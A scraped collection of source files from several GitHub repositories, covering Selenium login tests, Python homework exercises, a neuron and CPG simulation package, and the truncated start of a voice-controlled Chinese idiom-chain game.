"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2099, "license_type": "no_license", "max_line_length": 73, "num_lines": 53, "path": "/webtest/testcase/login_test.py", "repo_name": "Cynthia59/MylubanWeb", "src_encoding": "UTF-8", "text": "from time import sleep\nimport unittest, random, sys\nsys.path.append(\"./models\")\nsys.path.append(\"./page_obj\")\nfrom models import myunit, function\nfrom page_obj.loginPage import login\n\n\nclass loginTest(myunit.MyTest):\n \"\"\"myluban登录测试\"\"\"\n def user_login_verify(self, username=\"\", password=\"\"):\n login(self.driver).user_login(username, password)\n\n def test_login1(self):\n \"\"\"用户名、密码为空登录\"\"\"\n self.user_login_verify()\n po = login(self.driver)\n self.assertEqual(po.user_pwd_empty_hint(), \"提示:请输入鲁班通行证账号或密码\")\n function.insert_img(self.driver, \"user_pwd_empty\")\n\n def test_login2(self):\n \"\"\"用户名正确、密码为空登录\"\"\"\n self.user_login_verify(username=\"pytest\")\n po = login(self.driver)\n self.assertEqual(po.user_pwd_empty_hint(), \"提示:请输入鲁班通行证账号或密码\")\n function.insert_img(self.driver, \"pwd_empty\")\n\n def test_login3(self):\n \"\"\"用户名为空、密码正确登录\"\"\"\n self.user_login_verify(password=\"abc123456\")\n po = login(self.driver)\n self.assertEqual(po.user_pwd_empty_hint(), \"提示:请输入鲁班通行证账号或密码\")\n function.insert_img(self.driver, \"user_empty\")\n\n def test_login4(self):\n \"\"\"用户名与密码不匹配\"\"\"\n character = random.choice('zyxwvutsrqponmlkjihgfedcba')\n username = \"cynthia\" + character\n self.user_login_verify(username=username, password=\"cynthia123456\")\n po = login(self.driver)\n self.assertEqual(po.user_pwd_error_hint(), \"提示:账户名或者密码错误!\")\n function.insert_img(self.driver, \"user_pwd_error\")\n\n def test_login5(self):\n \"\"\"用户名、密码正确\"\"\"\n self.user_login_verify(username=\"cynthia\", password=\"cynthia123456\")\n sleep(2)\n po = login(self.driver)\n self.assertEqual(po.user_login_success(), \"桌面\")\n function.insert_img(self.driver, \"user_pwd_true\")\n \nif __name__ == \"__main__\":\n unittest.main()" }, { "alpha_fraction": 0.6130884289741516, "alphanum_fraction": 0.6239954233169556, "avg_line_length": 31.27777862548828, "blob_id": "c3a556b07a006587a85c3d562d7efee99b869c7a", "content_id": "c50fd0101bee2368d2b78bcbe4e887657b87d999", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1928, "license_type": "no_license", "max_line_length": 107, "num_lines": 54, "path": "/webtest/testcase/page_obj/loginPage.py", "repo_name": "Cynthia59/MylubanWeb", "src_encoding": "UTF-8", "text": "from selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom .base import Page\nfrom time import sleep\n\n\nclass login(Page):\n '''用户登录页面'''\n\n url = '/#/login'\n\n #登录输入控件\n login_username_loc = (By.XPATH, \"//*[@placeholder='请输入鲁班通行证账号或手机号']\")\n login_password_loc = (By.XPATH, \"//*[@placeholder='请输入密码']\")\n login_button_loc = (By.ID, \"loginPer\")\n \n # 登录用户名\n def login_username(self, username):\n self.fine_element(*self.login_username_loc).send_keys(username)\n \n # 登录密码\n def login_password(self, password):\n self.fine_element(*self.login_password_loc).send_keys(password)\n \n # 登录按钮\n def login_button(self):\n self.fine_element(*self.login_button_loc).click()\n \n # 定义统一登录入口\n def user_login(self, username=\"username\", password=\"1111\"):\n \"\"\"获取的用户名密码登录\"\"\"\n self.open()\n sleep(1)\n self.login_username(username)\n self.login_password(password)\n self.login_button()\n sleep(1)\n\n #登录验证控件\n user_pwd_empty_hint_loc = (By.XPATH, \"/html/body/div[1]/div[2]/div[2]/div/div[1]/form/div/div[4]/p[2]\")\n user_pwd_error_hint_loc = (By.XPATH, \"/html/body/div[1]/div[2]/div[2]/div/div[1]/form/div/div[4]/p[1]\")\n user_login_success_loc = (By.XPATH, \"/html/body/div[1]/div[2]/div[1]/div[1]/ul/li[1]\")\n\n # 用户名密码为空提示\n def user_pwd_empty_hint(self):\n return self.fine_element(*self.user_pwd_empty_hint_loc).text\n \n # 用户名密码错误提示\n def user_pwd_error_hint(self):\n return self.fine_element(*self.user_pwd_error_hint_loc).text\n \n # 登录成功用户名\n def user_login_success(self):\n return self.fine_element(*self.user_login_success_loc).text" }, { "alpha_fraction": 0.5436241626739502, "alphanum_fraction": 0.6308724880218506, "avg_line_length": 15.55555534362793, "blob_id": "0e91412cac420d62b0b7cf4324ef170a80936039", "content_id": "019d999dbf9e770f3e0b1f541fca7b68fae12f62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 149, "license_type": "no_license", "max_line_length": 30, "num_lines": 9, "path": "/webtest/testcase/__init__.py", "repo_name": "Cynthia59/MylubanWeb", "src_encoding": "UTF-8", "text": "#encoding: utf-8\n\"\"\"\n@project = MylubanWeb\n@file = __init__.py\n@function = \n@author = Cindy\n@create_time = 2018/6/11 11:08\n@python_version = 3.x\n\"\"\"\n" }, { "alpha_fraction": 0.6026272773742676, "alphanum_fraction": 0.6083743572235107, "avg_line_length": 28.731706619262695, "blob_id": "b71f479733b89368f4e6749d56774362dc3eabda", "content_id": "c558023438b798bfe685babc57f64de3d067de2f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1308, "license_type": "no_license", "max_line_length": 67, "num_lines": 41, "path": "/webtest/testcase/models/function.py", "repo_name": "Cynthia59/MylubanWeb", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nimport os, shutil\n\n# 截图函数\ndef insert_img(driver, file_name):\n base_dir = os.path.dirname(os.path.dirname(__file__))\n base_dir = str(base_dir)\n base_dir = base_dir.replace('\\\\', '/')\n base = base_dir.split('/testcase')[0]\n file_path = base + \"/report/image/\" + file_name + \".png\"\n driver.get_screenshot_as_file(file_path)\n\n# 查找最新的测试报告\ndef latest_report():\n base_dir = os.path.dirname(os.path.dirname(__file__))\n base_dir = str(base_dir)\n base_dir = base_dir.replace('\\\\', '/')\n base = base_dir.split('/testcase')[0]\n result_dir = base + \"/report\"\n lists = os.listdir(result_dir)\n # 重新按时间对目录下的文件进行排序\n lists.sort(key=lambda fn: os.path.getmtime(result_dir+\"\\\\\"+fn))\n print('最新的文件为: ' + lists[-1])\n file = os.path.join(result_dir, lists[-1]).replace('\\\\','/')\n # print(file)\n return file\n\n#复制最新的测试报告\ndef copy_latest_report():\n old = latest_report()\n new = old.split('/20')[0] + '/new_report.html'\n shutil.copyfile(old, new)\n # print('copy done!')\n\n \nif __name__ == '__main__':\n driver = webdriver.Chrome()\n driver.get(\"http://www.baidu.com\")\n insert_img(driver, 'baidu')\n driver.quit()\n copy_latest_report()" } ]
6
dariasuslova/python_homework
https://github.com/dariasuslova/python_homework
98c712c7bab123f7a26aa0cfe428f9e6b496af0c
d32e160d8c64111beb1338d48e47a35c1e01b3a0
8a8815642a27809402224518b5bd01960270060b
refs/heads/master
2021-01-23T14:41:37.000950
2018-03-21T11:49:06
2018-03-21T11:49:06
102,695,549
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5462962985038757, "alphanum_fraction": 0.5462962985038757, "avg_line_length": 21.285715103149414, "blob_id": "b1b8734d308d1636e5b6794c3b17a89f849a3fc6", "content_id": "cb4964173616b66e309a57d434fc423e74e5c5fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 324, "license_type": "no_license", "max_line_length": 42, "num_lines": 14, "path": "/homework_1/task_3.py", "repo_name": "dariasuslova/python_homework", "src_encoding": "UTF-8", "text": "class UniqObject:\r\n obj = None\r\n \r\n def __init__(self, name):\r\n self.name = name\r\n \r\n @classmethod\r\n def create_object(cls):\r\n if cls.obj is None:\r\n cls.obj = UniqObject('object')\r\n return cls.obj\r\n \r\nSingleton = UniqObject('object')\r\nprint(Singleton.create_object())" }, { "alpha_fraction": 0.41056910157203674, "alphanum_fraction": 0.4390243887901306, "avg_line_length": 16.923076629638672, "blob_id": "2849ee55102259285c4fe362b52013745d6d8778", "content_id": "43c330173faf4a38c376e8d6f643f51db00f432d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "no_license", "max_line_length": 30, "num_lines": 13, "path": "/homework_1/task_1.py", "repo_name": "dariasuslova/python_homework", "src_encoding": "UTF-8", "text": "def fibonacci(n):\r\n if n.__class__ is not int:\r\n return None\r\n elif n == 0:\r\n return 0\r\n elif n == 1:\r\n return 1\r\n x, y = 0, 1\r\n for i in range (n):\r\n x, y = y, x+y\r\n return x\r\n\r\nprint(fibonacci(6))\r\n" }, { "alpha_fraction": 0.4672068953514099, "alphanum_fraction": 0.4818941652774811, "avg_line_length": 26.22068977355957, "blob_id": "0f393af45d9c533f8422fe7ec7e9bb8998126725", "content_id": "22d47eb56723c0cb3a09dc7e5af61275b62785d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3951, "license_type": "no_license", "max_line_length": 90, "num_lines": 145, "path": "/homework_3/python_hw3.py", "repo_name": "dariasuslova/python_homework", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[1]:\n\n\nfrom pattern.web import Wikipedia, plaintext\nimport re\nimport nltk\nnltk.download('punkt')\nnltk.download('stopwords')\nfrom nltk import word_tokenize\nfrom nltk.collocations import *\nfrom collections import Counter, defaultdict\nfrom itertools import islice, tee\nimport math\nfrom nltk.corpus import stopwords\n\n\n# In[2]:\n\n\nclass WikiParser:\n def __init__(self):\n pass\n def get_articles(self, start):\n list_of_strings = []\n article = Wikipedia().article(start)\n cleaned1 = article.plaintext()\n clean1 = re.sub(r'[,;:\\(\\)\"\\[\\]<>\\*\\^\\-]*', '', cleaned1)\n new1 = clean1.replace(' ', ' ')\n new1 = new1.lower()\n list_of_strings.append(new1)\n l = article.links\n for i in l:\n a = Wikipedia(language='en').article(i)\n if a is not None:\n cleaned = a.plaintext()\n clean = re.sub(r'[,;:\\(\\)\"\\[\\]<>\\*\\^\\-]*', '', cleaned)\n new = clean.replace(' ', ' ')\n new = new.lower()\n list_of_strings.append(new)\n \n return list_of_strings\n\n\n# In[8]:\n\n\nclass TextStatistics:\n def __init___(self, articles):\n self.articles = articles\n pass\n def get_top_3grams(self, n, use_idf=False):\n d = defaultdict(int)\n a = self.articles\n sentences = []\n ar1 = []\n split_regex = re.compile(r'[.|!|?|…]')\n for i in a:\n sent = filter(lambda t: t, [t.strip() for t in split_regex.split(i)])\n sentences.append(sent)\n r1 = re.sub('[\\.,!?;:\\(\\)\"\\[\\]<>\\*\\^\\-]*', '', i)\n ar1.append(r1)\n kolvo = len(sentences)\n ngrams = zip(*(islice(seq, index, None) for index, seq in enumerate(tee(ar1, 3))))\n ngrams = [''.join(x) for x in ngrams]\n cntr = Counter(ngrams).most_common(n)\n for ngr in ngrams:\n for sent in sentences:\n if ngr in sent:\n if d[ngr]<kolvo: \n d[ngr]+=1\n if use_idf == True: \n res = []\n for nr, ch in cntr:\n for h, pred in d.items():\n if nr == h:\n res.append((nr, ch*math.log(kolvo/pred)))\n return (res)\n else:\n return(cntr)\n\n def get_top_words(self, n, use_idf=False):\n a1 = self.articles\n d1 = defaultdict(int)\n t1 = []\n tokens = []\n for aa in a1:\n re.sub('[\\.,!?;:\\(\\)\"\\[\\]<>\\*\\^\\-]*', '', aa)\n for a2 in a1:\n word_tokenize(a2)\n #tokens.append(tok)\n filtered_words = [word for word in a1 if word not in stopwords.words('english')]\n cnt = Counter(filtered_words).most_common(n)\n for w in filtered_words:\n for t in a1:\n if w in t:\n if d1[w]<len(a1): \n d1[w]+=1\n if use_idf == True: \n res1 = []\n for ws, c in cnt:\n for wrd, tx in d1.items():\n print(ws, c)\n print(wrd, tx)\n if ws == wrd:\n res1.append((ws, c*math.log(len(a1)/tx)))\n return (res1)\n else:\n return (cnt)\n\n\n# In[119]:\n\n\nt = Wikipedia().article('Hotels.com')\ncleaned = t.plaintext()\ncl = TextStatistics()\ncl.articles = cleaned\nprint(cl.get_top_3grams(20))\nprint(cl.get_top_words(20, True))\n\n\n# In[4]:\n\n\nclass Experiment:\n def __init__(self):\n pass\n def show_results(self):\n c = WikiParser()\n texts = c.get_articles(\"Natural language processing\")\n cl = TextStatistics()\n cl.articles = texts\n n = cl.get_top_3grams(20)\n w = cl.get_top_words(20, True)\n return ('3grams 20 top:{} /n top 20 words {}'.format(n,w))\n \n\n\n# In[9]:\n\n\ncla = Experiment()\nprint(cla.show_results())\n\n" }, { "alpha_fraction": 0.5124074816703796, "alphanum_fraction": 0.5180670619010925, "avg_line_length": 22.94565200805664, "blob_id": "b2994ddfd80890be29c4a677c66d71013d830e9b", "content_id": "970c76bc5be956b3a4841d7558b35d57c999d974", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2363, "license_type": "no_license", "max_line_length": 99, "num_lines": 92, "path": "/homework_1/task_2.py", "repo_name": "dariasuslova/python_homework", "src_encoding": "UTF-8", "text": "\r\nimport random\r\n\r\nclass Bird:\r\n def __init__(self, name):\r\n self._name = name\r\n def get_name(self):\r\n return self._name\r\n def can_fly(self):\r\n return True\r\n def colour(self):\r\n return('multi-coloured')\r\n def can_be_feeded(self):\r\n return False\r\n def you_can_touch(self):\r\n return False\r\n \r\nclass WildBird(Bird): #Полиморфизм\r\n def __init__(self, name):\r\n super().__init__(name)\r\n \r\n\r\nclass HomeBird(Bird): #Полиморфизм\r\n def __init__(self, name):\r\n super().__init__(name)\r\n \r\n def can_be_feeded(self):\r\n return True\r\n \r\n \r\nclass Calibri(WildBird): #Полиморфизм \r\n def __init__(self, name):\r\n super().__init__(name)\r\n \r\n def colour(self):\r\n return 'Blue'\r\n\r\nclass Chicken(HomeBird): #Полиморфизм \r\n def __init__(self, name):\r\n super().__init__(name)\r\n \r\n def colour(self):\r\n return 'White'\r\n \r\n def you_can_touch(self):\r\n if random.random() > 0.35:\r\n return True\r\n else:\r\n return False\r\n \r\n\r\nclass Owl(WildBird): #Полиморфизм \r\n def __init__(self, name):\r\n super().__init__(name)\r\n \r\n def colour(self):\r\n return 'Snowy'\r\n \r\n def you_can_touch(self):\r\n if random.random() > 0.75:\r\n return True\r\n else:\r\n return False\r\n\r\nclass Goose(HomeBird): #Полиморфизм\r\n def __init__(self, name):\r\n super().__init__(name)\r\n\r\n def colour(self):\r\n return 'White'\r\n \r\n def you_can_touch(self):\r\n if random.random() > 0.85:\r\n return True\r\n else:\r\n return False\r\n\r\nclass Human:\r\n def __init__(self, birdy):\r\n self.birdy = birdy\r\n \r\n def hooman_and_birdy(self):\r\n if self.birdy.you_can_touch() == True and self.birdy.can_be_feeded() == True:\r\n return 'Hooman can feed and touch %s %s' % (self.birdy.colour(), self.birdy.get_name())\r\n else:\r\n return \"%s %s is a wild bird\" % (self.birdy.colour(), self.birdy.get_name())\r\n \r\nbirdybird = Chicken('Liza')\r\nhuman = Human(birdybird)\r\nprint(human.hooman_and_birdy())\r\nbirdybird2 = Owl('Hedwig')\r\nhuman2 = Human(birdybird2)\r\nprint(human2.hooman_and_birdy())\r\n" }, { "alpha_fraction": 0.5493171215057373, "alphanum_fraction": 0.5776429176330566, "avg_line_length": 36.980770111083984, "blob_id": "107ac93963f65efd8cb6e180414af42b2bd0c568", "content_id": "964fcb0598908c4471863b9105f72dfa92251b34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2132, "license_type": "no_license", "max_line_length": 192, "num_lines": 52, "path": "/homework_4/homework_4.py", "repo_name": "dariasuslova/python_homework", "src_encoding": "UTF-8", "text": "\ndef poly_hash(s, x=31, p=997):\n h = 0\n for j in range(len(s)-1, -1, -1):\n h = (h * x + ord(s[j]) + p) % p\n return h\n\ndef search_rabin_multi(text, patterns):\n indices = []\n for pattern in patterns:\n pos=[]\n pattern_hash = poly_hash(pattern)\n for i in range(len(text) - len(pattern)):\n substr_hash = poly_hash(text[i: i + len(pattern)])\n if substr_hash == pattern_hash:\n if text[i: i + len(pattern)] == pattern:\n pos.append(i)\n indices.append(pos)\n return indices\n\n# ###### Асимтоматическая оценка сложности алгоритма\n# сложность функции poly_hash равняется O(n), так как в ней всего один цикл => сложность функции search_rabin_multi будет включать в себя сложность функции poly_hash => сложность фунции O(n^3)\n\nfrom unittest import *\n\nclass SearchNaiveTest(TestCase):\n def setUp(self):\n self.search = search_rabin_multi\n def test_empty(self):\n text = ''\n patterns = ['w', 't']\n self.assertEqual(len(self.search(text, patterns)[0]), 0)\n self.assertEqual(len(self.search(text, patterns)[1]), 0)\n \n def test_empty_pattern(self):\n text = 'cat'\n patterns = []\n self.assertEqual(len(self.search(text, patterns)), 0)\n \n def test_big_pattern(self):\n text = 'dog'\n patterns = ['dogdogdog']\n self.assertEqual(len(self.search(text, patterns)[0]), 0)\n \n def test_count(self):\n text = 'Betty Botter bought some butter, But, she said, the butter’s bitter. If I put it in my batter, It will make my batter bitter.'\n patterns = ['tt', 'll', 'ke', 'i']\n indices = [[2, 8, 27, 66, 75, 113, 149, 156], [136], [141], [56, 74, 102, 105, 135, 155]]\n self.assertListEqual(self.search(text, patterns), indices)\n \ncase = SearchNaiveTest()\nsuite = TestLoader().loadTestsFromModule(case)\nTextTestRunner().run(suite)\n\n" } ]
5
bernatguillen/neuronpy
https://github.com/bernatguillen/neuronpy
0f5ef03753c65d5e7ccd68fb81d6ecc6ed0d2523
fcf0c345b323bf628e15868c080bb0c060638dde
4bc90cb2dd090311c34a9d245d733691a4094d2c
refs/heads/master
2016-06-02T15:37:49.052548
2015-02-12T03:38:18
2015-02-12T03:38:18
28,929,038
1
1
null
2015-01-07T19:02:41
2015-01-16T00:48:30
2015-01-16T23:48:46
Python
[ { "alpha_fraction": 0.5337978005409241, "alphanum_fraction": 0.5676897168159485, "avg_line_length": 37.456520080566406, "blob_id": "80c531abaacacd1f89513e8403301271326a2017", "content_id": "a0d4777d34b1cb3a2cc1c1d1f63c80320333eb16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5311, "license_type": "no_license", "max_line_length": 371, "num_lines": 138, "path": "/neuropy/neuron.py", "repo_name": "bernatguillen/neuronpy", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy.integrate import ode\nfrom collections import Counter\n\nclass Environ(object):\n \"\"\"\n Environ holds all the 'global' variables\n \"\"\"\n\n def __init__(self,initvars = None):\n if initvars is None:\n CPG = {\"C\":2.4 , \"ep\":2.5, \"de\":0.051, \"gKS\":0.19, \"Iext\":37., \"Syn\":{\"CPG\":{\"vSyn\":0.,\"kSyn\":0.8, \"tauSyn\":5., \"gSyn\":0.2}, \"Df\":{\"vSyn\":0., \"kSyn\":0.8, \"tauSyn\":5., \"gSyn\":0.6}, \"Ds\":{\"vSyn\":-10., \"kSyn\":0.8, \"tauSyn\":5., \"gSyn\":2.}}}\n Df = {\"C\":2.4 , \"ep\":2.5, \"de\":0.051, \"gKS\":0.25, \"Iext\":37.}\n Ds = {\"C\":2.4 , \"ep\":2, \"de\":0.0002, \"gKS\":0.5, \"Iext\":50.}\n initvars={\"gK\":9.0 , \"gCa\":4.4, \"gL\":2.0, \"EK\":-80., \"ECa\":120., \"EL\":-60., \"VCa\":-1.2, \n \"kCa\":1./18., \"VK\":2., \"kK\":1./10., \"kc\":0.7, \"Vc\":-25., \"neu\":{\"CPG\":CPG,\"Df\":Df, \"Ds\":Ds}}\n vars(self).update(initvars)\n\n\nclass Model(Environ):\n \"\"\"\n Model represents the model in Ghiglia, Holmes paper:\n Cv' = - [ICa + IK + IL + IKS] + Iext\n m' = ep/tm(v)*(mInf(v)-m)\n c' = del/tc(v)*(cInf(v)-c)\n\n ICa = gCa*nInf(v)(v-ECa)\n IL = gL*(v-EK)\n IK = gK*m*(v-EK)\n IKS = gKS*c*(v-EK)\n wInf(v) = 1/(1+exp(-kw(v-vwth))) = 0.5*(1+tanh(-kw(v-vwth)/2)) (w = m,c,n)\n tw(v) = sech(kw(v-vwth)) (w = m,c,n)\n \"\"\"\n\n def __init__(self, cls, initvars = None):\n super(Model, self).__init__(initvars)\n initvars2 = self.neu.get(cls)\n vars(self).update(initvars2)\n self.cls = cls\n \n def singledyn(self,t,V,m,c,Iadd = 0):\n\n mInf = 0.5*(1+np.tanh((V-self.VK)*self.kK))\n cInf = 0.5*(1+np.tanh((V-self.Vc)*self.kc))\n nInf = 0.5*(1+np.tanh((V-self.VCa)*self.kCa))\n #tm = 1./cosh((V-self.env.V3)/(2*self.env.V4))\n #tc = 1./cosh((V-self.env.Vc)*self.env.kK/4)\n ICa = self.gCa*nInf*(V-self.ECa)\n IK = self.gK*m*(V-self.EK)\n IKS = self.gKS*c*(V-self.EK)\n IL = self.gL*(V-self.EL) #EK in paper\n Iext = self.Iext + Iadd\n Vd = -1./self.C*(ICa + IK + IL + IKS) + Iext/self.C\n md = self.ep*(mInf-m)*np.cosh(self.kK*(V-self.VK)/2)\n cd = self.de*(cInf-c)*np.cosh(self.kK*(V-self.Vc)/2)\n \n return [Vd, md, cd]\n \nclass Synapse(object):\n \"\"\"\n Synapse is an object that contains the model for s12\n \"\"\"\n \n def __init__(self,cls1,cls2,initvars12 = None):\n self.mod1 = Model(cls1)\n self.mod2 = Model(cls2)\n if initvars12 is None:\n initvars12 = self.mod1.Syn.get(cls2)\n vars(self).update(initvars12)\n def synapsedyn(self,V1,s):\n Sinf =\t1./(1+np.exp(-self.kSyn*(V1-self.vSyn)));\n sd\t=\t1./self.tauSyn*(Sinf*(1-s)-s);\n return sd\n \nclass Neuron(Model):\n \"\"\"\n Neuron is an object that contains the model for V, w and c\n \"\"\"\n \n def dyn(self,t,x):\n [V,m,c] = x\n xd = self.singledyn(t,V,m,c)\n return np.array([xd])\n \n def sym(self,t0,x0,tmax,dt):\n\n r = ode(self.dyn).set_integrator('dopri5')\n r.set_initial_value(np.array(x0),t0) \n t = [t0]\n xd = [np.array(x0)]\n while r.successful() and r.t < tmax:\n r.integrate(r.t + dt)\n t.append(r.t)\n xd.append(r.y)\n # print(\"%g %g %g %g\" %(r.t, r.y[0],r.y[1],r.y[2]))\n print(r.successful())\n return [t, xd]\n\nclass System(object):\n \"\"\"\n System represents the system of neurons and synapses that we will simulate\n \"\"\"\n def __init__(self,cls,connect):\n self.neurons = cls\n aux = Counter(cls)\n self.models = {key : Model(key) for key in aux}\n self.N = connect.shape[0]\n self.syns = {}\n for i in range(self.N):\n for j in range(self.N):\n if connect[i,j] == 1:\n self.syns.setdefault((cls[i],cls[j]),[]).append(np.array([i,j]))\n self.syns = {key:np.vstack(self.syns[key]) for key in self.syns}\n self.synmodels = {key: Synapse(*key) for key in self.syns}\n self.xd = np.hstack((np.zeros((self.N,1)),np.zeros((self.N,1)),\n np.zeros((self.N,1)),np.zeros((self.N,self.N))))\n def dyn(self,t,x):\n y= x.reshape(self.N,3+self.N)\n Iadd = np.array([sum([getattr(self.synmodels.get((self.neurons[i],self.neurons[j])),'gSyn',0)*y[i,j+3]*(y[j,0]-getattr(self.synmodels.get((self.neurons[i],self.neurons[j])),'vSyn',0)) for i in range(self.N)]) for j in range(self.N)]) #all the synaptic info that comes from other neurons is added here to form the exterior current that will be included in the dynamics\n for key in self.models:\n [V,m,c]=self.models[key].singledyn(t,y[np.where([i == key for i in self.neurons]),0],y[np.where([i == key for i in self.neurons]),1], y[np.where([i == key for i in self.neurons]),2], Iadd = Iadd[np.where([i == key for i in self.neurons])])\n [self.xd[np.where([i == key for i in self.neurons]),0],self.xd[np.where([i == key for i in self.neurons]),1],self.xd[np.where([i == key for i in self.neurons]),2]] = [V,m,c]\n for key in self.syns:\n self.xd[self.syns.get(key)[:,0],self.syns.get(key)[:,1]+3] = self.synmodels.get(key).synapsedyn(y[self.syns.get(key)[:,0],0],y[self.syns.get(key)[:,0],self.syns.get(key)[:,1]+3])\n return self.xd.reshape(-1)\n \n def sym(self,t0,x0,tmax,dt):\n r = ode(self.dyn).set_integrator('dopri5')\n r.set_initial_value(x0.reshape(-1),t0) \n t = [t0]\n x = [x0.reshape(-1)]\n while r.successful() and r.t < tmax:\n r.integrate(r.t + dt)\n t.append(r.t)\n x.append(r.y)\n # print(\"%g %g %g %g\" %(r.t, r.y[0],r.y[1],r.y[2]))\n print(r.successful())\n return [t, x]\n " }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 20, "blob_id": "3b372a6528d82a70bcba229687c811833dda7f2d", "content_id": "54ceb40a2d58ee3340bc723976d4bf5682930ffb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20, "license_type": "no_license", "max_line_length": 20, "num_lines": 1, "path": "/neuropy/__init__.py", "repo_name": "bernatguillen/neuronpy", "src_encoding": "UTF-8", "text": "from neuron import *" }, { "alpha_fraction": 0.6193548440933228, "alphanum_fraction": 0.625806450843811, "avg_line_length": 27.18181800842285, "blob_id": "342530154e29d025258a1568bd59e35599817380", "content_id": "052565f04710b7447a4415334461e56e1ca303aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 310, "license_type": "no_license", "max_line_length": 56, "num_lines": 11, "path": "/setup.py", "repo_name": "bernatguillen/neuronpy", "src_encoding": "UTF-8", "text": "from setuptools import setup\n\nsetup(name='neuropy',\n version='0.1dev',\n description='Simulating bursting neurons and CPG',\n url='http://github.com/bernatguillen/neuropy',\n author='Bernat Guillen',\n author_email='[email protected]',\n license='MIT',\n packages=['neuropy'],\n zip_safe=False)\n" } ]
3
classstudios/speak-idoim_game
https://github.com/classstudios/speak-idoim_game
71d7b3450103bbd379a8acb6450db46f175ac225
47386e93819aaa598dd1f9d65b87c8c19c825c87
eaef72f599334360c5f4901353fc2dc2f85077bb
refs/heads/master
2022-11-25T10:09:52.753397
2020-08-02T11:45:25
2020-08-02T11:45:25
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5019373893737793, "alphanum_fraction": 0.5203037858009338, "avg_line_length": 31.915788650512695, "blob_id": "78950415aa27fd5f556e3571dd7c5e2470fd95e1", "content_id": "563cf8c5cf485b9110beeb30d684fad53965c395", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14206, "license_type": "no_license", "max_line_length": 123, "num_lines": 380, "path": "/f1-idoim game.py", "repo_name": "classstudios/speak-idoim_game", "src_encoding": "UTF-8", "text": "## author: 教室工作室馆长\r\n## 成语接龙代码部分参考: 微信公众号:Charles的皮卡丘\r\n## 使用科大讯飞 语音听写和语音合成——人工智能API\r\nimport websocket\r\nimport datetime\r\nimport hashlib\r\nimport base64\r\nimport hmac\r\nimport json\r\nfrom urllib.parse import urlencode\r\nimport time\r\nimport ssl\r\nfrom wsgiref.handlers import format_date_time\r\nfrom datetime import datetime\r\nfrom time import mktime\r\nimport _thread as thread\r\nimport pyttsx3\r\nimport os\r\nimport pyaudio\r\nimport wave\r\nimport io\r\nimport sys\r\nimport random\r\n\r\ninput_filename = \"input.wav\" # 麦克风采集的语音输入\r\ninput_filepath = \"\" # 输入文件的path\r\nin_path = input_filepath + input_filename\r\n\r\nSTATUS_FIRST_FRAME = 0 # 第一帧的标识\r\nSTATUS_CONTINUE_FRAME = 1 # 中间帧标识\r\nSTATUS_LAST_FRAME = 2 # 最后一帧的标识\r\n\r\n#通过麦克风采集音频\r\ndef get_audio(filepath):\r\n \r\n CHUNK = 256\r\n FORMAT = pyaudio.paInt16\r\n CHANNELS = 1 # 声道数\r\n RATE = 16000 # 采样率\r\n RECORD_SECONDS = 5\r\n WAVE_OUTPUT_FILENAME = filepath\r\n p = pyaudio.PyAudio()\r\n print(\"开始成语接龙,请说四字成语:\")\r\n stream = p.open(format=FORMAT,\r\n channels=CHANNELS,\r\n rate=RATE,\r\n input=True,\r\n frames_per_buffer=CHUNK)\r\n\r\n print(\"*\"*5, \"开始录音:请在5秒内输入语音\")\r\n frames = []\r\n for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\r\n i=i\r\n data = stream.read(CHUNK)\r\n frames.append(data)\r\n print(\"*\"*5, \"录音结束\\n\")\r\n stream.stop_stream()\r\n stream.close()\r\n p.terminate()\r\n wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb')\r\n wf.setnchannels(CHANNELS)\r\n wf.setsampwidth(p.get_sample_size(FORMAT))\r\n wf.setframerate(RATE)\r\n wf.writeframes(b''.join(frames))\r\n wf.close()\r\n \r\n#调用讯飞语音听写API的类\r\nclass Ws_Param(object):\r\n # 初始化\r\n def __init__(self, APPID, APIKey, APISecret, AudioFile):\r\n self.APPID = APPID\r\n self.APIKey = APIKey\r\n self.APISecret = APISecret\r\n self.AudioFile = AudioFile\r\n\r\n # 公共参数(common)\r\n self.CommonArgs = {\"app_id\": self.APPID}\r\n # 业务参数(business),更多个性化参数可在官网查看\r\n self.BusinessArgs = {\"domain\": \"iat\", \"language\": \"zh_cn\",\"ptt\":0, \"accent\": \"mandarin\", \"vinfo\":1,\"vad_eos\":10000}\r\n\r\n # 生成url\r\n def create_url(self):\r\n url = 'wss://ws-api.xfyun.cn/v2/iat'\r\n # 生成RFC1123格式的时间戳\r\n now = datetime.now()\r\n date = format_date_time(mktime(now.timetuple()))\r\n\r\n # 拼接字符串\r\n signature_origin = \"host: \" + \"ws-api.xfyun.cn\" + \"\\n\"\r\n signature_origin += \"date: \" + date + \"\\n\"\r\n signature_origin += \"GET \" + \"/v2/iat \" + \"HTTP/1.1\"\r\n # 进行hmac-sha256进行加密\r\n signature_sha = hmac.new(self.APISecret.encode('utf-8'), signature_origin.encode('utf-8'),\r\n digestmod=hashlib.sha256).digest()\r\n signature_sha = base64.b64encode(signature_sha).decode(encoding='utf-8')\r\n\r\n authorization_origin = \"api_key=\\\"%s\\\", 